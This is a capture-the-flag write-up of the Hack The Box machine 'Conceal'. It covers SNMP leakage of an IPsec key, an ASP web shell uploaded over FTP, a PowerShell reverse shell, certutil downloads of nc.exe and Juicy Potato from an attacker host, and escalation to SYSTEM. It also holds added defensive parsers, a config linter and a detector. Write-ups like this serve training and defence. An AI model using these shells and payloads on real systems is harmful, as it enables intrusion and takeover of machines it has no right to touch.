Hack The Box - Conceal

Quick Summary

Hey guys, today Conceal retired and here’s my write-up about it. Conceal was a straightforward, fun box. The only tricky part is establishing the IPsec connection that gives access to the filtered services. That first part involved some guessing, but after it everything is simple and very straightforward. I liked this machine and it was a very fun one. It’s a Windows machine and its IP is 10.10.10.116; I added it to /etc/hosts as conceal.htb. Let’s jump right in.



Nmap

As always we will start with nmap to scan for open ports and services.

nmap -sV -sT -sC conceal.htb



And we got nothing!

I ran another nmap UDP scan on all ports:

nmap -vvv -sU -o nmapudp conceal.htb --max-retries 0

The output was too long, so I will show only the important part:





Nmap could not determine the state of port 161, but it showed that port 500 is open.

I ran a third scan on ports 500 and 161:

nmap -p 161,500 -sV -sU -sC conceal.htb



Full output:

# Nmap 7.70 scan initiated Fri May 17 16:37:52 2019 as: nmap -p 161,500 -sV -sU -sC -o nmapudp2 conceal.htb
Nmap scan report for conceal.htb (10.10.10.116)
Host is up (0.20s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
| snmp-interfaces:
|   Software Loopback Interface 1\x00
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 1 Gbps
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
|   Intel(R) 82574L Gigabit Network Connection\x00
|     IP address: 10.10.10.116  Netmask: 255.255.255.0
|     MAC address: 00:50:56:b9:55:a7 (VMware)
|     Type: ethernetCsmacd  Speed: 1 Gbps
|     Traffic stats: 399.03 Kb sent, 6.41 Mb received
|   Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer LightWeight Filter-0000\x00
|     MAC address: 00:50:56:b9:55:a7 (VMware)
|     Type: ethernetCsmacd  Speed: 1 Gbps
|     Traffic stats: 399.03 Kb sent, 6.41 Mb received
|   Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-0000\x00
|     MAC address: 00:50:56:b9:55:a7 (VMware)
|     Type: ethernetCsmacd  Speed: 1 Gbps
|     Traffic stats: 399.03 Kb sent, 6.41 Mb received
|   Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer LightWeight Filter-0000\x00
|     MAC address: 00:50:56:b9:55:a7 (VMware)
|     Type: ethernetCsmacd  Speed: 1 Gbps
|_    Traffic stats: 399.03 Kb sent, 6.41 Mb received
| snmp-netstat:
|   TCP  0.0.0.0:21           0.0.0.0:0
|   TCP  0.0.0.0:80           0.0.0.0:0
|   TCP  0.0.0.0:135          0.0.0.0:0
|   TCP  0.0.0.0:445          0.0.0.0:0
|   TCP  0.0.0.0:49664        0.0.0.0:0
|   TCP  0.0.0.0:49665        0.0.0.0:0
|   TCP  0.0.0.0:49666        0.0.0.0:0
|   TCP  0.0.0.0:49667        0.0.0.0:0
|   TCP  0.0.0.0:49668        0.0.0.0:0
|   TCP  0.0.0.0:49669        0.0.0.0:0
|   TCP  0.0.0.0:49670        0.0.0.0:0
|   TCP  10.10.10.116:139     0.0.0.0:0
|   UDP  0.0.0.0:123          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:500          *:*
|   UDP  0.0.0.0:4500         *:*
|   UDP  0.0.0.0:5050         *:*
|   UDP  0.0.0.0:5353         *:*
|   UDP  0.0.0.0:5355         *:*
|   UDP  10.10.10.116:137     *:*
|   UDP  10.10.10.116:138     *:*
|   UDP  10.10.10.116:1900    *:*
|   UDP  10.10.10.116:65496   *:*
|   UDP  127.0.0.1:1900       *:*
|_  UDP  127.0.0.1:65497      *:*
| snmp-processes:
|   1:
|     Name: System Idle Process
|   4:
|     Name: System
|   308:
|     Name: smss.exe
|   348:
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalSystemNetworkRestricted
|   392:
|     Name: csrss.exe
|   468:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalService
|   472:
|     Name: wininit.exe
|   484:
|     Name: csrss.exe
|   564:
|     Name: winlogon.exe
|   584:
|     Name: services.exe
|   616:
|     Name: lsass.exe
|     Path: C:\Windows\system32\
|   696:
|     Name: fontdrvhost.exe
|   704:
|     Name: fontdrvhost.exe
|   712:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k DcomLaunch
|   812:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k RPCSS
|   900:
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k NetworkService
|   908:
|     Name: dwm.exe
|   940:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k netsvcs
|   976:
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalServiceNetworkRestricted
|   984:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalServiceNoNetwork
|   1140:
|     Name: vmacthlp.exe
|     Path: C:\Program Files\VMware\VMware Tools\
|   1232:
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalServiceNetworkRestricted
|   1248:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalSystemNetworkRestricted
|   1292:
|     Name: LogonUI.exe
|     Params: /flags:0x0 /state0:0xa3a2c855 /state1:0x41c64e6d
|   1392:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalServiceNetworkRestricted
|   1400:
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k LocalServiceNetworkRestricted
|   1492:
|     Name: spoolsv.exe
|     Path: C:\Windows\System32\
|   1728:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k apphost
|   1748:
|     Name: svchost.exe
|     Path: C:\Windows\System32\
|     Params: -k utcsvc
|   1788:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k ftpsvc
|   1856:
|     Name: SecurityHealthService.exe
|   1868:
|     Name: snmp.exe
|     Path: C:\Windows\System32\
|   1892:
|     Name: VGAuthService.exe
|     Path: C:\Program Files\VMware\VMware Tools\VMware VGAuth\
|   1912:
|     Name: vmtoolsd.exe
|     Path: C:\Program Files\VMware\VMware Tools\
|   1932:
|     Name: ManagementAgentHost.exe
|     Path: C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\
|   1956:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k iissvcs
|   1980:
|     Name: MsMpEng.exe
|   2068:
|     Name: Memory Compression
|   2204:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k LocalServiceAndNoImpersonation
|   2444:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k NetworkServiceNetworkRestricted
|   2952:
|     Name: WmiPrvSE.exe
|     Path: C:\Windows\system32\wbem\
|   2976:
|     Name: NisSrv.exe
|   3052:
|     Name: dllhost.exe
|     Path: C:\Windows\system32\
|     Params: /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
|   3132:
|     Name: SearchIndexer.exe
|     Path: C:\Windows\system32\
|     Params: /Embedding
|   3280:
|     Name: svchost.exe
|     Path: C:\Windows\system32\
|     Params: -k appmodel
|   3376:
|     Name: msdtc.exe
|     Path: C:\Windows\System32\
|   3948:
|     Name: svchost.exe
|   5004:
|     Name: SearchFilterHost.exe
|     Path: C:\Windows\system32\
|     Params: 0 700 704 712 8192 708
|   5032:
|     Name: SearchProtocolHost.exe
|     Path: C:\Windows\system32\
|_    Params: Global\UsGthrFltPipeMssGthrPipe23_ Global\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 "Software\Microsoft\Windows Search" "Moz
| snmp-sysdescr: Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
|_  System uptime: 2h08m26.61s (770661 timeticks)
| snmp-win32-services:
|   Application Host Helper Service
|   Background Intelligent Transfer Service
|   Background Tasks Infrastructure Service
|   Base Filtering Engine
|   CNG Key Isolation
|   COM+ Event System
|   COM+ System Application
|   Client License Service (ClipSVC)
|   Connected Devices Platform Service
|   Connected User Experiences and Telemetry
|   CoreMessaging
|   Cryptographic Services
|   DCOM Server Process Launcher
|   DHCP Client
|   DNS Client
|   Data Sharing Service
|   Data Usage
|   Device Setup Manager
|   Diagnostic Policy Service
|   Diagnostic Service Host
|   Distributed Link Tracking Client
|   Distributed Transaction Coordinator
|   Geolocation Service
|   Group Policy Client
|   IKE and AuthIP IPsec Keying Modules
|   IP Helper
|   IPsec Policy Agent
|   Local Session Manager
|   Microsoft Account Sign-in Assistant
|   Microsoft FTP Service
|   Network Connection Broker
|   Network List Service
|   Network Location Awareness
|   Network Store Interface Service
|   Plug and Play
|   Power
|   Print Spooler
|   Program Compatibility Assistant Service
|   RPC Endpoint Mapper
|   Remote Procedure Call (RPC)
|   SNMP Service
|   SSDP Discovery
|   Security Accounts Manager
|   Security Center
|   Server
|   Shell Hardware Detection
|   State Repository Service
|   Storage Service
|   Superfetch
|   System Event Notification Service
|   System Events Broker
|   TCP/IP NetBIOS Helper
|   Task Scheduler
|   Themes
|   Tile Data model server
|   Time Broker
|   TokenBroker
|   User Manager
|   User Profile Service
|   VMware Alias Manager and Ticket Service
|   VMware CAF Management Agent Service
|   VMware Physical Disk Helper Service
|   VMware Tools
|   WinHTTP Web Proxy Auto-Discovery Service
|   Windows Audio
|   Windows Audio Endpoint Builder
|   Windows Connection Manager
|   Windows Defender Antivirus Network Inspection Service
|   Windows Defender Antivirus Service
|   Windows Defender Security Centre Service
|   Windows Driver Foundation - User-mode Driver Framework
|   Windows Event Log
|   Windows Firewall
|   Windows Font Cache Service
|   Windows Management Instrumentation
|   Windows Process Activation Service
|   Windows Push Notifications System Service
|   Windows Search
|   Windows Time
|   Workstation
|_  World Wide Web Publishing Service
| snmp-win32-software:
|   Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161; 2018-10-12T20:10:30
|   Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161; 2018-10-12T20:10:22
|_  VMware Tools; 2018-10-12T20:11:02
| snmp-win32-users:
|   Administrator
|   DefaultAccount
|   Destitute
|_  Guest
500/udp open  isakmp  Microsoft Windows 8
| ike-version:
|   vendor_id: Microsoft Windows 8
|   attributes:
|     MS NT5 ISAKMPOAKLEY
|     RFC 3947 NAT-T
|     draft-ietf-ipsec-nat-t-ike-02
|     IKE FRAGMENTATION
|     MS-Negotiation Discovery Capable
|_    IKE CGA version 1
Service Info: Host: Conceal; OS: Windows 8; CPE: cpe:/o:microsoft:windows:8, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 17 16:42:05 2019 -- 1 IP address (1 host up) scanned in 253.58 seconds



We have two services to enumerate: isakmp, which is the IKE side of IPsec, and snmp. Note that the snmp-netstat section already lists TCP listeners (21, 80, 135, 139, 445) that the TCP scan never saw, so they are being filtered rather than absent.
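To make that point concrete, here is a small parser (an added example, not part of the original write-up and not an nmap feature) that reads the snmp-netstat and snmp-win32-users sections of the scan above and lists the TCP services the host is listening on but the TCP scan did not reach. The embedded excerpt is copied from the scan output above; the helper names are invented for this example. This is the information a read-only "public" community string hands to anyone on the network, which is why SNMPv1 with a default community is a finding on its own.

```python
"""Parse nmap's snmp-netstat / snmp-win32-users output and list what a
read-only 'public' community exposes.

Added example (not from the write-up, not part of nmap). The input is an
excerpt of the scan output shown above; helper names are invented here.
"""
import re
from collections import defaultdict

# Excerpt of the nmap output above (copied, trimmed to the two sections used).
NMAP_SNMP_EXCERPT = """\
| snmp-netstat:
|   TCP  0.0.0.0:21           0.0.0.0:0
|   TCP  0.0.0.0:80           0.0.0.0:0
|   TCP  0.0.0.0:135          0.0.0.0:0
|   TCP  0.0.0.0:445          0.0.0.0:0
|   TCP  0.0.0.0:49664        0.0.0.0:0
|   TCP  10.10.10.116:139     0.0.0.0:0
|   UDP  0.0.0.0:123          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:500          *:*
|   UDP  0.0.0.0:4500         *:*
|_  UDP  127.0.0.1:1900       *:*
| snmp-win32-users:
|   Administrator
|   DefaultAccount
|   Destitute
|_  Guest
"""

# One socket line: "|   TCP  <bind>:<port>  <remote>"; "|_" marks a script's last line.
SOCKET_RE = re.compile(r"^\|_?\s+(TCP|UDP)\s+(\S+):(\d+)\s+\S+$")
HEADER_RE = re.compile(r"^\|\s+(snmp-[\w-]+):\s*$")


def parse_snmp_sections(text):
    """Return {'listeners': {proto: [(bind_addr, port), ...]}, 'users': [...]}."""
    section = None
    listeners = defaultdict(list)
    users = []
    for line in text.splitlines():
        header = HEADER_RE.match(line)
        if header:
            section = header.group(1)
            continue
        if section == "snmp-netstat":
            m = SOCKET_RE.match(line)
            if m:
                proto, addr, port = m.group(1), m.group(2), int(m.group(3))
                listeners[proto].append((addr, port))
        elif section == "snmp-win32-users":
            name = line.lstrip("|_ ").strip()
            if name:
                users.append(name)
    return {"listeners": dict(listeners), "users": users}


def hidden_services(parsed, reachable_tcp_ports, loopback_prefix="127."):
    """Non-loopback TCP listeners that the TCP scan did not reach.

    On this box the TCP scan saw nothing, so every listener returned here is
    filtered (by the IPsec policy) and is visible only through SNMP.
    """
    found = set()
    for addr, port in parsed["listeners"].get("TCP", []):
        if not addr.startswith(loopback_prefix):
            found.add(port)
    return sorted(found - set(reachable_tcp_ports))


if __name__ == "__main__":
    parsed = parse_snmp_sections(NMAP_SNMP_EXCERPT)
    print("hidden TCP listeners:", hidden_services(parsed, reachable_tcp_ports=[]))
    print("local accounts:", parsed["users"])
```

Feeding it the real scan output instead of the excerpt works the same way, since the regexes only care about the `|`/`|_` prefix and the `PROTO addr:port remote` shape of each line.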

SNMP Enumeration

I started with snmpwalk:

snmpwalk -c public -v 1 conceal.htb

The output was very long, but we only need this first part:



We have a password hash for the IPsec connection: 9C8B1A372B1878851BE2C097031B6E43

I used CrackStation to crack it and got this result:



Great! Now we need to enumerate the IKE VPN service to find out how to connect to it.

ike-scan, Setting Up the Connection

I ran ike-scan and got these results:



I installed strongSwan to set up the IPsec connection. With the help of the info from ike-scan and some guessing, I came up with this configuration, which worked:

/etc/ipsec.conf:

conn rick-to-conceal
    authby=secret
    auto=route
    keyexchange=ikev1
    ike=3des-sha1-modp1024
    left=10.10.xx.xx
    right=10.10.10.116
    type=transport
    esp=3des-sha1
    rightprotoport=tcp



/etc/ipsec.secrets:

10.10.xx.xx 10.10.10.116 : PSK "Dudecake1!"



I started ipsec, then I brought the connection up:

ipsec start

ipsec up rick-to-conceal



It worked fine. Now that we are connected to the VPN, let’s see what new services we can reach.
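The conn above works because it negotiates exactly what the box offers, but read from the defender's side it is a list of things to avoid: IKEv1, a pre-shared key that was recoverable from SNMP, 3DES, SHA-1 and a 1024-bit DH group. The linter below (an added example, not part of the write-up or of strongSwan) parses a conn block and flags those settings. The first input is the write-up's conn; the second is a constructed hardened conn using IKEv2, certificate authentication and strict AES-GCM proposals. The strongSwan keywords are real; the hardened values and the helper names are assumptions made for this example.

```python
"""Lint a strongSwan ipsec.conf conn block for weak IKE/ESP settings.

Added example, not part of the write-up. WRITEUP_CONF is the conn used in
the write-up; HARDENED_CONF is a constructed alternative for comparison.
"""
import re

WRITEUP_CONF = """\
conn rick-to-conceal
    authby=secret
    auto=route
    keyexchange=ikev1
    ike=3des-sha1-modp1024
    left=10.10.xx.xx
    right=10.10.10.116
    type=transport
    esp=3des-sha1
    rightprotoport=tcp
"""

# Constructed hardened conn: real strongSwan keywords, assumed values.
HARDENED_CONF = """\
conn example-hardened
    authby=pubkey
    auto=route
    keyexchange=ikev2
    ike=aes256gcm16-sha384-ecp384!
    esp=aes256gcm16-ecp384!
    left=10.10.xx.xx
    right=10.10.10.116
    type=transport
"""

# Algorithm tokens deprecated for IKE/IPsec (RFC 9395, RFC 8247).
WEAK_TOKENS = {
    "des": "single DES",
    "3des": "3DES (64-bit blocks, Sweet32)",
    "md5": "MD5",
    "sha1": "SHA-1",
    "modp768": "768-bit DH group",
    "modp1024": "1024-bit DH group (Logjam)",
    "modp1536": "1536-bit DH group",
}


def parse_conn(text):
    """Return (conn_name, {key: value}) for a single conn block."""
    name, params = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^conn\s+(\S+)$", line)
        if m:
            name = m.group(1)
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            params[key.strip()] = value.strip()
    return name, params


def lint_conn(params):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    kx = params.get("keyexchange", "").lower()
    if kx != "ikev2":
        findings.append(f"keyexchange={kx or '(unset)'}: IKEv1 is deprecated (RFC 9395); set keyexchange=ikev2")
    if params.get("authby", "").lower() in ("secret", "psk"):
        findings.append("authby=secret: anyone who learns the PSK can join; here it was recoverable via SNMP")
    for key in ("ike", "esp"):
        proposal = params.get(key)
        if proposal is None:
            continue
        if not proposal.endswith("!"):
            # Without a trailing '!' strongSwan also offers its default proposals.
            findings.append(f"{key}={proposal}: proposal is not strict (no trailing '!')")
        for token in re.split(r"[-,]", proposal.rstrip("!")):
            token = token.lower()
            if token in WEAK_TOKENS:
                findings.append(f"{key}= uses {token}: {WEAK_TOKENS[token]}")
    return findings


if __name__ == "__main__":
    for conf in (WRITEUP_CONF, HARDENED_CONF):
        name, params = parse_conn(conf)
        findings = lint_conn(params)
        print(f"{name}: {len(findings)} finding(s)")
        for f in findings:
            print("  -", f)
```

The linter only looks at one conn block at a time; to audit a full ipsec.conf you would split it on `conn` headers first. The lab box needs the weak settings because that is what its IKE responder offers, which is itself the finding.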

Nmap (Second Time)

nmap -sV -sT -sC conceal.htb



We got FTP on port 21, HTTP on port 80 and SMB on port 445. I wanted to check FTP first and see if I could authenticate anonymously.

FTP, File Upload, Reverse Shell and User Flag



It worked, but there was literally nothing on that FTP server. I uploaded a test file to check whether I had write permissions on the server, and I did.



I checked the HTTP service and there was only the default IIS page:



I ran gobuster with /usr/share/wordlists/dirb/common.txt and got only one directory, called /upload:

gobuster -u http://conceal.htb/ -w /usr/share/wordlists/dirb/common.txt

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://conceal.htb/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/17 17:18:57 Starting gobuster
=====================================================
/upload (Status: 301)
=====================================================
2019/05/17 17:28:23 Finished
=====================================================



I went to /upload and found my test file, which means the FTP root is served by IIS and executes scripts:



Great! I uploaded an ASP shell to get remote code execution:



shell.asp:

<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objShell.Exec(theCommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
End Function
%>

<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<% Response.Write(Request.ServerVariables("server_name")) %>
<p>
<b>The server's port:</b>
<% Response.Write(Request.ServerVariables("server_port")) %>
</p>
<p>
<b>The server's software:</b>
<% Response.Write(Request.ServerVariables("server_software")) %>
</p>
<p>
<b>The server's local address:</b>
<% Response.Write(Request.ServerVariables("LOCAL_ADDR")) %>
<% szCMD = Request("cmd")
thisDir = getCommandOutput("cmd /c " & szCMD)
Response.Write(thisDir) %>
</p>
</PRE>
</BODY>
</HTML>







I got a PowerShell reverse shell:



Payload:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.xx.xx',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"





We got user.

SeImpersonatePrivilege, Juicy Potato, Privilege Escalation and Root Flag

After getting user, the privilege escalation is easy and straightforward. Before doing any enumeration I checked my privileges as Destitute and found that I had SeImpersonatePrivilege.



This means that we can apply the famous Juicy Potato attack. You can read about it on the official GitHub repository. We need to know the Windows version to pick the right CLSID.

systeminfo



It’s Microsoft Windows 10 Enterprise. I got the CLSID of wuauserv from here, which is:

{e60687f7-01a1-40aa-86ac-db1cbf673334}

I got a compiled binary of Juicy Potato from the GitHub repository. I hosted it on a Python simple HTTP server, then downloaded it onto the machine with certutil:

certutil -urlcache -split -f http://10.10.xx.xx/juicypotato.exe juicypotato.exe





However, I had some problems with my PowerShell reverse shell and it couldn’t run juicypotato.exe properly, so I got another cmd shell with nc:

certutil -urlcache -split -f http://10.10.xx.xx/nc.exe nc.exe

nc.exe -e cmd.exe 10.10.xx.xx 1339





I created a bat file that executes nc.exe -e cmd.exe 10.10.xx.xx 1340 to get me a reverse shell:

echo C:\users\Destitute\appdata\local\temp\nc.exe -e cmd.exe 10.10.xx.xx 1340 > rev.bat



Then I ran juicypotato.exe and made it execute that bat file :

juicypotato.exe -p C:\users\Destitute\appdata\local\temp\rev.bat -l 1340 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}





It worked fine and we got a reverse shell as nt authority\system.
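That Juicy Potato step leaves a distinctive trace in process-creation telemetry: a process running as NT AUTHORITY\SYSTEM whose parent runs as an ordinary user and lives in that user's Temp directory. The script below (an added example, not from the write-up or the Juicy Potato project) runs that detection over a few constructed process-creation records. The field names are a simplified stand-in for Sysmon event 1 / Security 4688 data, not the real schema, and the sample events, including the CONCEAL\Destitute account spelling, are constructed for the example.

```python
"""Detect user-to-SYSTEM process transitions of the kind token-impersonation
escalation (e.g. Juicy Potato) produces.

Added example, not from the write-up. EVENTS are constructed records with a
simplified schema (user, parent_user, image, parent_image, command_line);
this is not the real Sysmon/4688 field layout.
"""
import ntpath

SYSTEM_ACCOUNTS = {"nt authority\\system"}

# Parents that legitimately start SYSTEM processes (service control, boot).
TRUSTED_PARENT_IMAGES = {
    "c:\\windows\\system32\\services.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\windows\\system32\\svchost.exe",
}

# Path fragments ordinary users can write to.
USER_WRITABLE_HINTS = (
    "\\appdata\\local\\temp\\",
    "\\users\\public\\",
    "\\programdata\\",
    "\\windows\\temp\\",
)

# Constructed sample events (not real telemetry).
EVENTS = [
    {"id": 1, "user": "NT AUTHORITY\\SYSTEM", "parent_user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\svchost.exe",
     "parent_image": "C:\\Windows\\System32\\services.exe",
     "command_line": "svchost.exe -k netsvcs"},
    {"id": 2, "user": "CONCEAL\\Destitute", "parent_user": "CONCEAL\\Destitute",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "cmd.exe"},
    {"id": 3, "user": "NT AUTHORITY\\SYSTEM", "parent_user": "CONCEAL\\Destitute",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Users\\Destitute\\AppData\\Local\\Temp\\juicypotato.exe",
     "command_line": "C:\\Windows\\System32\\cmd.exe /c C:\\Users\\Destitute\\AppData\\Local\\Temp\\rev.bat"},
    {"id": 4, "user": "NT AUTHORITY\\SYSTEM", "parent_user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\ProgramData\\ExampleVendor\\updater.exe",
     "parent_image": "C:\\Windows\\System32\\svchost.exe",
     "command_line": "updater.exe /silent"},
]


def score_event(ev):
    """Return [(severity, reason), ...]; an empty list means nothing suspicious."""
    hits = []
    if ev["user"].lower() not in SYSTEM_ACCOUNTS:
        return hits  # this rule only cares about SYSTEM children
    parent_image = ev["parent_image"].lower()
    parent_is_system = ev["parent_user"].lower() in SYSTEM_ACCOUNTS
    # High: a SYSTEM child whose parent is a plain user process outside the trusted set.
    if not parent_is_system and parent_image not in TRUSTED_PARENT_IMAGES:
        hits.append(("high", f"SYSTEM child spawned by {ev['parent_user']} "
                             f"via {ntpath.basename(parent_image)}"))
    # Medium: a SYSTEM process whose image, command line or parent sits in a user-writable dir.
    for path in (ev["image"].lower(), ev["command_line"].lower(), parent_image):
        if any(hint in path for hint in USER_WRITABLE_HINTS):
            hits.append(("medium", f"SYSTEM process involves user-writable path: {path}"))
            break
    return hits


def triage(events):
    """Map event id -> highest severity among its hits; clean events are omitted."""
    rank = {"high": 2, "medium": 1}
    result = {}
    for ev in events:
        hits = score_event(ev)
        if hits:
            result[ev["id"]] = max(hits, key=lambda h: rank[h[0]])[0]
    return result


if __name__ == "__main__":
    for ev in EVENTS:
        for severity, reason in score_event(ev):
            print(f"event {ev['id']} [{severity}] {reason}")
```

Event 3 is the Juicy Potato pattern and scores high; event 4 (a SYSTEM updater under ProgramData, launched by a service host) only scores medium, which is the kind of benign-but-worth-a-look case the lower tier exists for. Removing SeImpersonatePrivilege from service accounts that do not need it, and not running IIS application pools or FTP with it, is the mitigation this detection backs up.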





And we owned root!

That’s it, feedback is appreciated!

Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, and follow me on Twitter @Ahm3d_H3sham.

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Lightweight

Next Hack The Box write-up : Hack The Box - Chaos